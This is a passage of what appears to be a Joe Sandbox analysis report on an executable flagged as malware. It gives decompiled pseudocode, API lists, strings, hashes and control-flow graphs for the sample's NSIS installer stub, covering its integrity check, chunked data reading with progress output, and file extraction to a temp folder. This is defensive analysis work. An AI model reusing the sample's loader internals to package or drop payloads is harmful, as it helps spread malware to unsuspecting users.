                                                                                        							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                                                        						}
                                                                                        						 *0x41ea18 =  *0x41ea18 + _t90;
                                                                                        						_t93 = _t93 - _t90;
                                                                                        						__eflags = _t93;
                                                                                        					} while (_t93 != 0);
                                                                                        					_t82 = 0;
                                                                                        					__eflags = 0;
                                                                                        					goto L24;
                                                                                        				}
                                                                                        			}































                                                                                        0x00403085
                                                                                        0x00403088
                                                                                        0x0040308b
                                                                                        0x0040308e
                                                                                        0x00403094
                                                                                        0x004030a5
                                                                                        0x004030aa
                                                                                        0x004030bd
                                                                                        0x004030c2
                                                                                        0x004030c5
                                                                                        0x004030cb
                                                                                        0x00000000
                                                                                        0x004030cd
                                                                                        0x004030d8
                                                                                        0x004030de
                                                                                        0x004030ef
                                                                                        0x004030f6
                                                                                        0x004030fc
                                                                                        0x004030fe
                                                                                        0x00403103
                                                                                        0x00403105
                                                                                        0x004031f0
                                                                                        0x004031f2
                                                                                        0x004031f7
                                                                                        0x004031fe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403200
                                                                                        0x00403203
                                                                                        0x00403227
                                                                                        0x00403227
                                                                                        0x0040322c
                                                                                        0x00403232
                                                                                        0x0040323d
                                                                                        0x00403242
                                                                                        0x00403242
                                                                                        0x00403245
                                                                                        0x00403246
                                                                                        0x00403247
                                                                                        0x00403249
                                                                                        0x0040324e
                                                                                        0x00403251
                                                                                        0x00403264
                                                                                        0x00403268
                                                                                        0x00403270
                                                                                        0x00403275
                                                                                        0x00403277
                                                                                        0x00403277
                                                                                        0x00403277
                                                                                        0x0040327f
                                                                                        0x0040327f
                                                                                        0x00403282
                                                                                        0x00403283
                                                                                        0x00403283
                                                                                        0x00403286
                                                                                        0x00403288
                                                                                        0x00403288
                                                                                        0x00403288
                                                                                        0x00403292
                                                                                        0x00403298
                                                                                        0x004032a6
                                                                                        0x004032ab
                                                                                        0x00000000
                                                                                        0x004032ab
                                                                                        0x00000000
                                                                                        0x00403251
                                                                                        0x0040320b
                                                                                        0x00403216
                                                                                        0x0040321b
                                                                                        0x0040321d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403222
                                                                                        0x00403225
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040310b
                                                                                        0x00403110
                                                                                        0x00403115
                                                                                        0x00403119
                                                                                        0x00403120
                                                                                        0x00403125
                                                                                        0x00403127
                                                                                        0x00403129
                                                                                        0x00403129
                                                                                        0x0040312d
                                                                                        0x00403132
                                                                                        0x00403134
                                                                                        0x0040325c
                                                                                        0x00403253
                                                                                        0x00000000
                                                                                        0x00403253
                                                                                        0x0040313a
                                                                                        0x00403141
                                                                                        0x004031bd
                                                                                        0x004031c1
                                                                                        0x004031c5
                                                                                        0x004031ca
                                                                                        0x00000000
                                                                                        0x004031c1
                                                                                        0x0040314a
                                                                                        0x0040314f
                                                                                        0x00403152
                                                                                        0x00403157
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403159
                                                                                        0x00403160
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403162
                                                                                        0x00403169
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040316b
                                                                                        0x00403172
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403174
                                                                                        0x0040317b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040317d
                                                                                        0x00403183
                                                                                        0x0040318c
                                                                                        0x00403192
                                                                                        0x00403195
                                                                                        0x00403197
                                                                                        0x0040319d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004031a3
                                                                                        0x004031a7
                                                                                        0x004031af
                                                                                        0x004031af
                                                                                        0x004031b2
                                                                                        0x004031b5
                                                                                        0x004031b7
                                                                                        0x004031b9
                                                                                        0x004031b9
                                                                                        0x00000000
                                                                                        0x004031b7
                                                                                        0x004031a9
                                                                                        0x004031ad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004031cb
                                                                                        0x004031cb
                                                                                        0x004031d1
                                                                                        0x004031dd
                                                                                        0x004031dd
                                                                                        0x004031e0
                                                                                        0x004031e6
                                                                                        0x004031e6
                                                                                        0x004031e6
                                                                                        0x004031ee
                                                                                        0x004031ee
                                                                                        0x00000000
                                                                                        0x004031ee

                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040308E
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                        • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                        • API String ID: 2803837635-3534558355
                                                                                        • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                        • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                        • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                        • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 526 4034b2-4034bb call 4034cf 521->526 527 4034af 521->527 522->524 528 403471 522->528 524->523 529 403371 525->529 530 403374-403382 call 4034cf 525->530 526->516 538 4034c2 526->538 527->526 532 403474-40347a 528->532 529->530 530->516 540 403388-403391 530->540 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-403493 call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 547 403460-403462 542->547 548 4033bd-4033d0 GetTickCount 542->548 549 403498-40349a 543->549 547->518 550 4033d2-4033da 548->550 551 40341b-40341d 548->551 552 403464-403466 549->552 553 40349c-4034a6 549->553 554 4033e2-403413 MulDiv wsprintfW call 40559f 550->554 555 4033dc-4033e0 550->555 556 403454-403458 551->556 557 40341f-403423 551->557 552->518 553->532 558 4034a8 553->558 563 403418 554->563 555->551 555->554 556->525 559 40345e 556->559 561 403425-40342c call 4060df 557->561 562 40343a-403445 557->562 558->524 559->524 566 403431-403433 561->566 565 403448-40344c 562->565 563->551 565->542 567 403452 565->567 566->552 568 403435-403438 566->568 567->524 568->565
                                                                                        C-Code - Quality: 95%
                                                                                        			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                        				signed int _v8;
                                                                                        				int _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				long _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				short _v152;
                                                                                        				void* _t65;
                                                                                        				void* _t69;
                                                                                        				long _t70;
                                                                                        				intOrPtr _t75;
                                                                                        				long _t76;
                                                                                        				intOrPtr _t77;
                                                                                        				void* _t78;
                                                                                        				int _t88;
                                                                                        				intOrPtr _t92;
                                                                                        				intOrPtr _t95;
                                                                                        				long _t96;
                                                                                        				signed int _t97;
                                                                                        				int _t98;
                                                                                        				int _t99;
                                                                                        				intOrPtr _t100;
                                                                                        				void* _t101;
                                                                                        				void* _t102;
                                                                                        
                                                                                        				_t97 = _a16;
                                                                                        				_t92 = _a12;
                                                                                        				_v12 = _t97;
                                                                                        				if(_t92 == 0) {
                                                                                        					_v12 = 0x8000;
                                                                                        				}
                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                        				_v16 = _t92;
                                                                                        				if(_t92 == 0) {
                                                                                        					_v16 = 0x422a20;
                                                                                        				}
                                                                                        				_t62 = _a4;
                                                                                        				if(_a4 >= 0) {
                                                                                        					E004034E5( *0x434f58 + _t62);
                                                                                        				}
                                                                                        				if(E004034CF( &_a16, 4) == 0) {
                                                                                        					L41:
                                                                                        					_push(0xfffffffd);
                                                                                        					goto L42;
                                                                                        				} else {
                                                                                        					if((_a19 & 0x00000080) == 0) {
                                                                                        						if(_t92 != 0) {
                                                                                        							if(_a16 < _t97) {
                                                                                        								_t97 = _a16;
                                                                                        							}
                                                                                        							if(E004034CF(_t92, _t97) != 0) {
                                                                                        								_v8 = _t97;
                                                                                        								L44:
                                                                                        								return _v8;
                                                                                        							} else {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_a16 <= _t92) {
                                                                                        							goto L44;
                                                                                        						}
                                                                                        						_t88 = _v12;
                                                                                        						while(1) {
                                                                                        							_t98 = _a16;
                                                                                        							if(_a16 >= _t88) {
                                                                                        								_t98 = _t88;
                                                                                        							}
                                                                                        							if(E004034CF(0x41ea20, _t98) == 0) {
                                                                                        								goto L41;
                                                                                        							}
                                                                                        							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
                                                                                        							if(_t69 == 0) {
                                                                                        								L28:
                                                                                        								_push(0xfffffffe);
                                                                                        								L42:
                                                                                        								_pop(_t65);
                                                                                        								return _t65;
                                                                                        							}
                                                                                        							_v8 = _v8 + _t98;
                                                                                        							_a16 = _a16 - _t98;
                                                                                        							if(_a16 > 0) {
                                                                                        								continue;
                                                                                        							}
                                                                                        							goto L44;
                                                                                        						}
                                                                                        						goto L41;
                                                                                        					}
                                                                                        					_t70 = GetTickCount();
                                                                                        					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                                                        					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                                                        					_t14 =  &_a16;
                                                                                        					 *_t14 = _a16 & 0x7fffffff;
                                                                                        					_v20 = _t70;
                                                                                        					 *0x40ce68 = 8;
                                                                                        					 *0x416a10 = 0x40ea08;
                                                                                        					 *0x416a0c = 0x40ea08;
                                                                                        					 *0x416a08 = 0x416a08;
                                                                                        					_a4 = _a16;
                                                                                        					if( *_t14 <= 0) {
                                                                                        						goto L44;
                                                                                        					} else {
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					while(1) {
                                                                                        						L9:
                                                                                        						_t99 = 0x4000;
                                                                                        						if(_a16 < 0x4000) {
                                                                                        							_t99 = _a16;
                                                                                        						}
                                                                                        						if(E004034CF(0x41ea20, _t99) == 0) {
                                                                                        							goto L41;
                                                                                        						}
                                                                                        						_a16 = _a16 - _t99;
                                                                                        						 *0x40ce58 = 0x41ea20;
                                                                                        						 *0x40ce5c = _t99;
                                                                                        						while(1) {
                                                                                        							_t95 = _v16;
                                                                                        							 *0x40ce60 = _t95;
                                                                                        							 *0x40ce64 = _v12;
                                                                                        							_t75 = E00406A65(0x40ce58);
                                                                                        							_v24 = _t75;
                                                                                        							if(_t75 < 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t100 =  *0x40ce60; // 0x425a20
                                                                                        							_t101 = _t100 - _t95;
                                                                                        							_t76 = GetTickCount();
                                                                                        							_t96 = _t76;
                                                                                        							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                        								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                        								_t102 = _t102 + 0xc;
                                                                                        								E0040559F(0,  &_v152); // executed
                                                                                        								_v20 = _t96;
                                                                                        							}
                                                                                        							if(_t101 == 0) {
                                                                                        								if(_a16 > 0) {
                                                                                        									goto L9;
                                                                                        								}
                                                                                        								goto L44;
                                                                                        							} else {
                                                                                        								if(_a12 != 0) {
                                                                                        									_t77 =  *0x40ce60; // 0x425a20
                                                                                        									_v8 = _v8 + _t101;
                                                                                        									_v12 = _v12 - _t101;
                                                                                        									_v16 = _t77;
                                                                                        									L23:
                                                                                        									if(_v24 != 1) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									goto L44;
                                                                                        								}
                                                                                        								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                                                        								if(_t78 == 0) {
                                                                                        									goto L28;
                                                                                        								}
                                                                                        								_v8 = _v8 + _t101;
                                                                                        								goto L23;
                                                                                        							}
                                                                                        						}
                                                                                        						_push(0xfffffffc);
                                                                                        						goto L42;
                                                                                        					}
                                                                                        					goto L41;
                                                                                        				}
                                                                                        			}


























                                                                                        0x004032bf
                                                                                        0x004032c3
                                                                                        0x004032c6
                                                                                        0x004032cb
                                                                                        0x004032cd
                                                                                        0x004032cd
                                                                                        0x004032d4
                                                                                        0x004032d8
                                                                                        0x004032dd
                                                                                        0x004032df
                                                                                        0x004032df
                                                                                        0x004032e6
                                                                                        0x004032eb
                                                                                        0x004032f6
                                                                                        0x004032f6
                                                                                        0x00403308
                                                                                        0x004034bd
                                                                                        0x004034bd
                                                                                        0x00000000
                                                                                        0x0040330e
                                                                                        0x00403312
                                                                                        0x0040346a
                                                                                        0x004034ad
                                                                                        0x004034af
                                                                                        0x004034af
                                                                                        0x004034bb
                                                                                        0x004034c2
                                                                                        0x004034c5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004034bb
                                                                                        0x0040346f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403471
                                                                                        0x00403474
                                                                                        0x00403477
                                                                                        0x0040347a
                                                                                        0x0040347c
                                                                                        0x0040347c
                                                                                        0x0040348c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403493
                                                                                        0x0040349a
                                                                                        0x00403464
                                                                                        0x00403464
                                                                                        0x004034bf
                                                                                        0x004034bf
                                                                                        0x00000000
                                                                                        0x004034bf
                                                                                        0x0040349c
                                                                                        0x0040349f
                                                                                        0x004034a6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004034a8
                                                                                        0x00000000
                                                                                        0x00403474
                                                                                        0x0040331e
                                                                                        0x00403320
                                                                                        0x00403327
                                                                                        0x0040332e
                                                                                        0x0040332e
                                                                                        0x00403335
                                                                                        0x0040333d
                                                                                        0x00403347
                                                                                        0x0040334c
                                                                                        0x00403354
                                                                                        0x0040335e
                                                                                        0x00403361
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403367
                                                                                        0x00403367
                                                                                        0x00403367
                                                                                        0x0040336f
                                                                                        0x00403371
                                                                                        0x00403371
                                                                                        0x00403382
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403388
                                                                                        0x0040338b
                                                                                        0x00403391
                                                                                        0x00403397
                                                                                        0x00403397
                                                                                        0x004033a2
                                                                                        0x004033a8
                                                                                        0x004033ad
                                                                                        0x004033b4
                                                                                        0x004033b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033bd
                                                                                        0x004033c3
                                                                                        0x004033c5
                                                                                        0x004033ce
                                                                                        0x004033d0
                                                                                        0x00403401
                                                                                        0x00403407
                                                                                        0x00403413
                                                                                        0x00403418
                                                                                        0x00403418
                                                                                        0x0040341d
                                                                                        0x00403458
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040341f
                                                                                        0x00403423
                                                                                        0x0040343a
                                                                                        0x0040343f
                                                                                        0x00403442
                                                                                        0x00403445
                                                                                        0x00403448
                                                                                        0x0040344c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403452
                                                                                        0x0040342c
                                                                                        0x00403433
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403435
                                                                                        0x00000000
                                                                                        0x00403435
                                                                                        0x0040341d
                                                                                        0x00403460
                                                                                        0x00000000
                                                                                        0x00403460
                                                                                        0x00000000
                                                                                        0x00403367

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$wsprintf
                                                                                        • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                        • API String ID: 551687249-3683892814
                                                                                        • Opcode ID: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
                                                                                        • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                        • Opcode Fuzzy Hash: 56b0f536eed8a80aa022ebbc190999bc8f902075b9028e03b58b2e81be541d07
                                                                                        • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 580 4017b5-4017b6 call 4067c4 574->580 575->580 584 4017bb-4017bf 580->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 594 4017dd-4017ef 585->594 595 4017cd-4017db CompareFileTime 585->595 587 4017f7-4017f8 call 406008 586->587 588 4017fd-401819 call 40602d 586->588 587->588 596 40181b-40181e 588->596 597 40188d-4018b6 call 40559f call 4032b4 588->597 594->586 595->594 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 631 401864-401865 598->631 609 401882-401888 599->609 614 402c33 609->614 611->612 613 4018d0-4018db CloseHandle 611->613 612->613 616 4018e1-4018e4 613->616 617 402c2a-402c2d 613->617 619 402c35-402c39 614->619 620 4018e6-4018f7 call 40657a lstrcatW 616->620 621 4018f9-4018fc call 40657a 616->621 617->614 627 401901-402398 620->627 621->627 632 40239d-4023a2 627->632 633 402398 call 405b9d 627->633 631->609 634 401867-401868 631->634 632->619 633->632 634->599
                                                                                        C-Code - Quality: 75%
                                                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                        				void* __esi;
                                                                                        				void* _t35;
                                                                                        				void* _t43;
                                                                                        				void* _t45;
                                                                                        				FILETIME* _t51;
                                                                                        				FILETIME* _t64;
                                                                                        				void* _t66;
                                                                                        				signed int _t72;
                                                                                        				FILETIME* _t73;
                                                                                        				FILETIME* _t77;
                                                                                        				signed int _t79;
                                                                                        				WCHAR* _t81;
                                                                                        				void* _t83;
                                                                                        				void* _t84;
                                                                                        				void* _t86;
                                                                                        
                                                                                        				_t77 = __ebx;
                                                                                        				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                        				_t35 = E00405E83( *(_t86 - 8));
                                                                                        				_push( *(_t86 - 8));
                                                                                        				_t81 = L"Call";
                                                                                        				if(_t35 == 0) {
                                                                                        					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
                                                                                        				} else {
                                                                                        					E0040653D();
                                                                                        				}
                                                                                        				E004067C4(_t81);
                                                                                        				while(1) {
                                                                                        					__eflags =  *(_t86 + 8) - 3;
                                                                                        					if( *(_t86 + 8) >= 3) {
                                                                                        						_t66 = E00406873(_t81);
                                                                                        						_t79 = 0;
                                                                                        						__eflags = _t66 - _t77;
                                                                                        						if(_t66 != _t77) {
                                                                                        							_t73 = _t66 + 0x14;
                                                                                        							__eflags = _t73;
                                                                                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                        						}
                                                                                        						asm("sbb eax, eax");
                                                                                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                        						__eflags = _t72;
                                                                                        						 *(_t86 + 8) = _t72;
                                                                                        					}
                                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                                        					if( *(_t86 + 8) == _t77) {
                                                                                        						E00406008(_t81);
                                                                                        					}
                                                                                        					__eflags =  *(_t86 + 8) - 1;
                                                                                        					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                        					__eflags = _t43 - 0xffffffff;
                                                                                        					 *(_t86 - 0x38) = _t43;
                                                                                        					if(_t43 != 0xffffffff) {
                                                                                        						break;
                                                                                        					}
                                                                                        					__eflags =  *(_t86 + 8) - _t77;
                                                                                        					if( *(_t86 + 8) != _t77) {
                                                                                        						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                                                        						__eflags =  *(_t86 + 8) - 2;
                                                                                        						if(__eflags == 0) {
                                                                                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                        						}
                                                                                        						L31:
                                                                                        						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                                                        						__eflags =  *0x434f88;
                                                                                        						goto L32;
                                                                                        					} else {
                                                                                        						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp", _t83);
                                                                                        						E0040653D(_t83, _t81);
                                                                                        						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                        						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp");
                                                                                        						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsiF917.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                                                        						__eflags = _t64;
                                                                                        						if(_t64 == 0) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							__eflags = _t64 == 1;
                                                                                        							if(_t64 == 1) {
                                                                                        								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                                                        								L32:
                                                                                        								_t51 = 0;
                                                                                        								__eflags = 0;
                                                                                        							} else {
                                                                                        								_push(_t81);
                                                                                        								_push(0xfffffffa);
                                                                                        								E0040559F();
                                                                                        								L29:
                                                                                        								_t51 = 0x7fffffff;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					L33:
                                                                                        					return _t51;
                                                                                        				}
                                                                                        				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                                                        				 *0x434fb4 =  *0x434fb4 + 1;
                                                                                        				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                        				 *0x434fb4 =  *0x434fb4 - 1;
                                                                                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                        				_t84 = _t45;
                                                                                        				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                        					L22:
                                                                                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                        				} else {
                                                                                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                        						goto L22;
                                                                                        					}
                                                                                        				}
                                                                                        				CloseHandle( *(_t86 - 0x38)); // executed
                                                                                        				__eflags = _t84 - _t77;
                                                                                        				if(_t84 >= _t77) {
                                                                                        					goto L31;
                                                                                        				} else {
                                                                                        					__eflags = _t84 - 0xfffffffe;
                                                                                        					if(_t84 != 0xfffffffe) {
                                                                                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                        					} else {
                                                                                        						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                        						lstrcatW(_t81,  *(_t86 - 8));
                                                                                        					}
                                                                                        					_push(0x200010);
                                                                                        					_push(_t81);
                                                                                        					E00405B9D();
                                                                                        					goto L29;
                                                                                        				}
                                                                                        				goto L33;
                                                                                        			}


















                                                                                        0x0040176f
                                                                                        0x00401776
                                                                                        0x00401782
                                                                                        0x00401785
                                                                                        0x0040178a
                                                                                        0x0040178d
                                                                                        0x00401794
                                                                                        0x004017b0
                                                                                        0x00401796
                                                                                        0x00401797
                                                                                        0x00401797
                                                                                        0x004017b6
                                                                                        0x004017bb
                                                                                        0x004017bb
                                                                                        0x004017bf
                                                                                        0x004017c2
                                                                                        0x004017c7
                                                                                        0x004017c9
                                                                                        0x004017cb
                                                                                        0x004017d0
                                                                                        0x004017d0
                                                                                        0x004017db
                                                                                        0x004017db
                                                                                        0x004017ec
                                                                                        0x004017ee
                                                                                        0x004017ee
                                                                                        0x004017ef
                                                                                        0x004017ef
                                                                                        0x004017f2
                                                                                        0x004017f5
                                                                                        0x004017f8
                                                                                        0x004017f8
                                                                                        0x004017ff
                                                                                        0x0040180e
                                                                                        0x00401813
                                                                                        0x00401816
                                                                                        0x00401819
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040181b
                                                                                        0x0040181e
                                                                                        0x00401874
                                                                                        0x00401879
                                                                                        0x004015b6
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00402c2a
                                                                                        0x00402c2d
                                                                                        0x00402c2d
                                                                                        0x00000000
                                                                                        0x00401820
                                                                                        0x00401826
                                                                                        0x0040182d
                                                                                        0x0040183a
                                                                                        0x00401845
                                                                                        0x0040185b
                                                                                        0x0040185b
                                                                                        0x0040185e
                                                                                        0x00000000
                                                                                        0x00401864
                                                                                        0x00401864
                                                                                        0x00401865
                                                                                        0x00401882
                                                                                        0x00402c33
                                                                                        0x00402c33
                                                                                        0x00402c33
                                                                                        0x00401867
                                                                                        0x00401867
                                                                                        0x00401868
                                                                                        0x00401493
                                                                                        0x0040239d
                                                                                        0x0040239d
                                                                                        0x0040239d
                                                                                        0x00401865
                                                                                        0x0040185e
                                                                                        0x00402c35
                                                                                        0x00402c39
                                                                                        0x00402c39
                                                                                        0x00401892
                                                                                        0x00401897
                                                                                        0x004018a5
                                                                                        0x004018aa
                                                                                        0x004018b0
                                                                                        0x004018b4
                                                                                        0x004018b6
